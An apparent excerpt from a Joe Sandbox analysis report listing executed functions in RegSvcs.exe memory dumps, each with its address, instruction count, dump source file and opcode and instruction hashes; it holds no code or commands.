                                              • Instruction ID: 0d3249c45e54e982a1c7318e279da309283474fafde044080f2c3a1230d30425
                                              • Opcode Fuzzy Hash: b9daf118bfbcc3bf9e3a36b33321736fd5490af0d73cb682b29b312aa5d5cce5
                                              • Instruction Fuzzy Hash: 42B092311402088F82009B58E548C0137A8AB08A143010090E1088B232C621FC008A51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B95D8 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a57468e45b522e9f62c0e4fc24165146402edb316c2842cade32e52eb89d60d4
                                              • Instruction ID: 0f89da43d48e8546da21c571a1b68bf98e626838e4444cf3ccae743307a93113
                                              • Opcode Fuzzy Hash: a57468e45b522e9f62c0e4fc24165146402edb316c2842cade32e52eb89d60d4
                                              • Instruction Fuzzy Hash: 8FB0123101030ECBD5017774F8095147B1DE781604B401114B10D061459EEC684246C8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B8DB0 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d43e2264246c4a0da3ac368cf2efe12590fdcd30fd38b4766a3432737d23ef98
                                              • Instruction ID: fe83ba7eac9e9e64623024d19600c3f52b75761d0f935106b299ef11d1cff018
                                              • Opcode Fuzzy Hash: d43e2264246c4a0da3ac368cf2efe12590fdcd30fd38b4766a3432737d23ef98
                                              • Instruction Fuzzy Hash: B1B0123100174F8FC9417778F54A5143F1ED6806147401114A10D09105ADEC690047C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2EB0 Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cac1df5fab0cc3a7499f18a1ba8893fe420ee9bd22c9e21ae46c8839885bf98
                                              • Instruction ID: 7d5dd9f432c48dc25fb9416ca09c8da71379681309dd31e4ee4d6bcc0d887883
                                              • Opcode Fuzzy Hash: 0cac1df5fab0cc3a7499f18a1ba8893fe420ee9bd22c9e21ae46c8839885bf98
                                              • Instruction Fuzzy Hash: 7590023506870C8F85402796740A9D97B5C95445267C44151F50D425159E5568509995
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 02900F81 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d t
                                              • API String ID: 0-2792223501
                                              • Opcode ID: 8e5e08473e81d1b6b44ffba60ea1f1bf55fd6098850867fd5a3e6f68576e5ee8
                                              • Instruction ID: 17dcb0f0eaca928e09b9e949f78ea93b2f1f2ab09b529b998b07d88b73055e35
                                              • Opcode Fuzzy Hash: 8e5e08473e81d1b6b44ffba60ea1f1bf55fd6098850867fd5a3e6f68576e5ee8
                                              • Instruction Fuzzy Hash: 3D517D30B142149FD714DF6DC498A5EBBF6EF89700F2581AAE406EB3A1CB719D05CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02900DE8 Relevance: .1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 338e1fef861a049ae559a2ce4217923ead42890ce06297af897717a8fa4717df
                                              • Instruction ID: 426ff52bfb95c7df2f41ea35544ff5c3b9ff50c3180c129620a194cad113da23
                                              • Opcode Fuzzy Hash: 338e1fef861a049ae559a2ce4217923ead42890ce06297af897717a8fa4717df
                                              • Instruction Fuzzy Hash: C74193317042058FDB15DF69D498B9DBBF6EF89304F1445AAE105EB3A1CB759C05CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02900B49 Relevance: .1, Instructions: 127COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71a844240d890e29566062797206be53cbf79441acd4931265dae75d32110e21
                                              • Instruction ID: 04d56e20cc407549bc69e53e4822e85738e4a06752d62b7636f6379edfa71399
                                              • Opcode Fuzzy Hash: 71a844240d890e29566062797206be53cbf79441acd4931265dae75d32110e21
                                              • Instruction Fuzzy Hash: 8B51FB3C102202CFC706FB34FA549893BB2FB84709310956DD5099BB6DEBB9A946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02901298 Relevance: .1, Instructions: 113COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18944be6a16be425b0fea874224a10e6f8cff498c04e52a9d1129fb283a62391
                                              • Instruction ID: dafbd9d33c72ce6576905c398b1803fd56065172195e149cd31d21b7b21e70b0
                                              • Opcode Fuzzy Hash: 18944be6a16be425b0fea874224a10e6f8cff498c04e52a9d1129fb283a62391
                                              • Instruction Fuzzy Hash: 12419F70E042499FDB04DBFD889466EBFF6EFC9300F208569D44AD7382DA7499468BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 029009B8 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21d4d0c767d7e8c3a3196c9da1bd0448cd7f7310e5c1eb86e5db001b43a72674
                                              • Instruction ID: dce6bbee576057b3ff8021b791bb5921a593469be2f927f5413a27085e6142ba
                                              • Opcode Fuzzy Hash: 21d4d0c767d7e8c3a3196c9da1bd0448cd7f7310e5c1eb86e5db001b43a72674
                                              • Instruction Fuzzy Hash: AB31713070170A8FDB14AB7AE99837E7AE9AF84704704592DD84AC72D0FF60D941CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 029009A8 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 665273ad1fa2dc7f67a446c5fb6361352670fbb1335c9e18c68422bef417c6ce
                                              • Instruction ID: 00bd3ae4f0072ad7c8a0a41f43fc51eab2c1a68e7c943306d982ab38f44d2d87
                                              • Opcode Fuzzy Hash: 665273ad1fa2dc7f67a446c5fb6361352670fbb1335c9e18c68422bef417c6ce
                                              • Instruction Fuzzy Hash: 4541BF307017498FDB18AB7AD99833E3AEABB84744704592DD84AC72D0FF60D945CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02901402 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60f3b4a45c5ee23c773c3c78d00e48195039e2317b3d3c93e64fb846c1b21eda
                                              • Instruction ID: b5f99bdf34c94240c2f2211016ae089a623e6a5be28c91d62841360a61795aa8
                                              • Opcode Fuzzy Hash: 60f3b4a45c5ee23c773c3c78d00e48195039e2317b3d3c93e64fb846c1b21eda
                                              • Instruction Fuzzy Hash: 0931C170F012568FCB14EB7988A466EBBF2BFC9700B14446DE14ADB3A1DE309D06C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02900DD8 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85e2544794ddec32e825c7c7229d8b44001de255ea7449de4b558968060839ea
                                              • Instruction ID: bc748f1ce31427aca972ed0cd1e526fc261684754eb0d3df06d1654117dc2af7
                                              • Opcode Fuzzy Hash: 85e2544794ddec32e825c7c7229d8b44001de255ea7449de4b558968060839ea
                                              • Instruction Fuzzy Hash: 97317035A04209CFDB14DF68C498BADBBF6FF88304F148569E505AB3A1CB759D09CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D6D4A0 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2796883725.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_d6d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3892539c150451ee19fb3643ddf6d79f4958bcfa2a3756d8420d46746aa6ae08
                                              • Instruction ID: d02c9b6f963f7b81e65f8fc29eb4ce9fe778d4893bbdc618f704eee0e7c9b6e7
                                              • Opcode Fuzzy Hash: 3892539c150451ee19fb3643ddf6d79f4958bcfa2a3756d8420d46746aa6ae08
                                              • Instruction Fuzzy Hash: 57214872A04200DFDB15DF04E9C0B26BF62FB84318F24C16CD90A0B256C336E815CBB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D6D49B Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2796883725.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_d6d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction ID: 58df476ecfd8a6828e3fea4fcae1c8dea26208273d2c73cef274a6676c33f2cb
                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction Fuzzy Hash: D011E976904240CFCF16CF14D5C4B56BF72FB94314F28C5A9D9064B656C336D856CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 029014F9 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 194590ade35ed729f41903236a67ff987fe3bd0bdc139f5674d80c5ad445d6af
                                              • Instruction ID: 2821c35638f36adf6ab7773032c36ef0719d06715d38d4d7dee1a1a9c90a46b1
                                              • Opcode Fuzzy Hash: 194590ade35ed729f41903236a67ff987fe3bd0bdc139f5674d80c5ad445d6af
                                              • Instruction Fuzzy Hash: 38118274A01205DFC755EBB8DA595AEBBF6EF8820471504BDD40BDB355DA31CC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02901508 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a74436005b304129733293e73bbccd8551b6adf5f4984e380344c2a9edde21be
                                              • Instruction ID: 88ffdcd594bf2d8664a5b7eeb91ca24946065fb4fc57a79a79efcc29bc2e27ec
                                              • Opcode Fuzzy Hash: a74436005b304129733293e73bbccd8551b6adf5f4984e380344c2a9edde21be
                                              • Instruction Fuzzy Hash: 7611AD74B00209CFCB54EBB9DA496AEBBF6FF882047100879D40ADB358EA31DC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02900F07 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83da00fe0514fdda51979cd352b175ed2bf7f17d03a7b93990eb6a942e9283c1
                                              • Instruction ID: bbd1656ef5abcc1577e27c1da7d7351cdf54e8136e8cca7672a176f4c209d55b
                                              • Opcode Fuzzy Hash: 83da00fe0514fdda51979cd352b175ed2bf7f17d03a7b93990eb6a942e9283c1
                                              • Instruction Fuzzy Hash: 01F0C8217182414FD74A577D546455D2FA39FCB11032504BBE149CB3A2DE298C079375
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02900F48 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b137ebc901c9d51b3224b42c8ada5f2fcf72777df56d0becac7afd201f812e6f
                                              • Instruction ID: 5eefb2aad3357b9f780ddf29e102b3b352788bb978535f82a243dff53ebe2a0b
                                              • Opcode Fuzzy Hash: b137ebc901c9d51b3224b42c8ada5f2fcf72777df56d0becac7afd201f812e6f
                                              • Instruction Fuzzy Hash: 7FE0C2313002008F87889A3EB88485BB7DAEFCC1303550479F10DC7321DE61CC024790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              Function 01670F81 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d t
                                              • API String ID: 0-2792223501
                                              • Opcode ID: d784984d3f2fc8b83d889ade248dadab43d8af09154ec0584dc099898e1e6ee6
                                              • Instruction ID: 77891ffda761aad06db07d24388f5a7ba9c60c8dee17c20a5de1ed04cbf88ea5
                                              • Opcode Fuzzy Hash: d784984d3f2fc8b83d889ade248dadab43d8af09154ec0584dc099898e1e6ee6
                                              • Instruction Fuzzy Hash: D2518B30B105148FC714DF69C898A5EBBF6EF89710F2580AAE806EB3A5CB75DD01CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01670DE8 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee41161f72a9f8a09ae45b74562b9c02909d131871e00c26abc4ec035bf882ed
                                              • Instruction ID: c4a8b60962c34aa76821a9bf1367724542f8a752ca3cc77515e018a0c8dda18b
                                              • Opcode Fuzzy Hash: ee41161f72a9f8a09ae45b74562b9c02909d131871e00c26abc4ec035bf882ed
                                              • Instruction Fuzzy Hash: 21418F317042058FDB19DF69D854B9EBBF6FF8A210F1445AAE106EB362CB759C05CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01670B49 Relevance: .1, Instructions: 127COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fba4b998024a6f2d84bfffe3c013cc5ae2ebdb47c99f1f7cad3552cfeb43b2a1
                                              • Instruction ID: 4e82f5688ef6de18014cd8117e864ceba5c44677ed9121bba28fecba45dde255
                                              • Opcode Fuzzy Hash: fba4b998024a6f2d84bfffe3c013cc5ae2ebdb47c99f1f7cad3552cfeb43b2a1
                                              • Instruction Fuzzy Hash: 25510D3860124BCFC726EF34E8A45693B7AFFC5315314556ED8029B22CDB75A909CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01671298 Relevance: .1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1daa0b28b7351f9b07a8c8448a04a9be3dc5a6c284e31fe6730b8ecf6bc578f
                                              • Instruction ID: daede7959c3df68c8fe88dbd16b72a917e3f2e09cc5cbc3178b932f49eb934c3
                                              • Opcode Fuzzy Hash: e1daa0b28b7351f9b07a8c8448a04a9be3dc5a6c284e31fe6730b8ecf6bc578f
                                              • Instruction Fuzzy Hash: 1D419370E002099FCB04DBF9C85466EBFFAEFC9310F24C16AD41AD7346DA3499428BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 016709A8 Relevance: .1, Instructions: 113COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76278da509795803c4c226afcfacf80ffd710d258eb06c23f9147ad34526730c
                                              • Instruction ID: 17db27409fba913af970aae3622caa4055eecb77594b519d203a06388c9e2201
                                              • Opcode Fuzzy Hash: 76278da509795803c4c226afcfacf80ffd710d258eb06c23f9147ad34526730c
                                              • Instruction Fuzzy Hash: 8A418B30600606CFEB38BF79DC2463A7AA6BF86645B14662DE813C7345EF24D9058BB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 016709B8 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df1d2b8c4cdea567c49a9ccf78af4a82b58bfcd30599cef6c4e7e8ef451672ed
                                              • Instruction ID: 4417d4d07ff3adb78d129a2d8372f61c4e181e940a910a1137b73a0d1c01020c
                                              • Opcode Fuzzy Hash: df1d2b8c4cdea567c49a9ccf78af4a82b58bfcd30599cef6c4e7e8ef451672ed
                                              • Instruction Fuzzy Hash: 53317C30710606CFEB39BF7A9C2827E7AA5BF85645B14662DE903C7345EF20D9058BB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01670DD8 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 367fe3f62e83ebc9ddb3f2c8820ed95b83ec7df5c542316259c59eb520ef124c
                                              • Instruction ID: 2bfa7917c5c016bd3be5cc862bf622ca796400662c7097219914fe9c1d352885
                                              • Opcode Fuzzy Hash: 367fe3f62e83ebc9ddb3f2c8820ed95b83ec7df5c542316259c59eb520ef124c
                                              • Instruction Fuzzy Hash: 01316C75A002058FDB14DF69D888B9DBBF6FF4A304F1445ADE501AB361CB75AC45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01671402 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4d30c571b0637de174aff2cbaeca4f344d4d71904899b276acd1e89dd8ec4aa
                                              • Instruction ID: a067ed65d165c62e0b072adcda6c82258c8fc396eec3b9cac1268541a305a268
                                              • Opcode Fuzzy Hash: f4d30c571b0637de174aff2cbaeca4f344d4d71904899b276acd1e89dd8ec4aa
                                              • Instruction Fuzzy Hash: 5831BD70B012168FCB04EB79C895A6EBBF6BF89610B14806DE54ADB354EE31DC02C7D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0161D4A0 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4002433118.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_161d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3487f64a4274ab3ff33d697a21bc899bb9286d70428facdb2147c63278f93027
                                              • Instruction ID: 660f15fecb940e0889c58f72234adfba46d98de5ec1bade839bb2bc248ac37cb
                                              • Opcode Fuzzy Hash: 3487f64a4274ab3ff33d697a21bc899bb9286d70428facdb2147c63278f93027
                                              • Instruction Fuzzy Hash: D1212872504240EFDB05DF58DDC4B26BF65FB84318F28C16DE90A0B25AC376D456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0161D49B Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4002433118.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_161d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction ID: f846a54b13c7fea04bc4147f63bd12acd9a38267d2ca411a7d0100b9731ff242
                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                              • Instruction Fuzzy Hash: 1F11B1B6504280DFDB16CF54D9C4B16BF71FB84324F28C6A9D9090B26BC33AD456CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 016714F9 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5db6eed4ae92864f04967329bc2f15da5abe533eee0723651fae93c1fddcd10e
                                              • Instruction ID: c924cffbb0fc22c22691d3fd501a1f4f031723c9737d1844844fd9c833787d3e
                                              • Opcode Fuzzy Hash: 5db6eed4ae92864f04967329bc2f15da5abe533eee0723651fae93c1fddcd10e
                                              • Instruction Fuzzy Hash: DE11C2B5B00206DFCB55EB78DD149AABBF6EF89200708447AD806DB319DB31D812CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01671508 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85cabddc7e56e3defa77b37f50d329d271a36b0388145183a4f0b45450277a4c
                                              • Instruction ID: 134a2dc33e0b156e6b5f6a2381bef400f0cbca7113f7e8c01af58e6f428cd82a
                                              • Opcode Fuzzy Hash: 85cabddc7e56e3defa77b37f50d329d271a36b0388145183a4f0b45450277a4c
                                              • Instruction Fuzzy Hash: 3B116575B00205DFCB59EB79D91456ABBF6EFC9200714047AD806D7358DB35DC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01670F07 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000027.00000002.4003363838.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_39_2_1670000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad3ef98a3bb1a66be1302e36ff1f51b23db65186259badddbe156e2ec8138289
                                              • Instruction ID: 4f423c69c729a3bc20e29eb594899bc11bfe12baf198912a326da7c7c5c33dbd
                                              • Opcode Fuzzy Hash: ad3ef98a3bb1a66be1302e36ff1f51b23db65186259badddbe156e2ec8138289
                                              • Instruction Fuzzy Hash: F801D6217082804FC75AEB3D985065A7FE6AFCB56032904AAD149CB353CE298C06C3A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%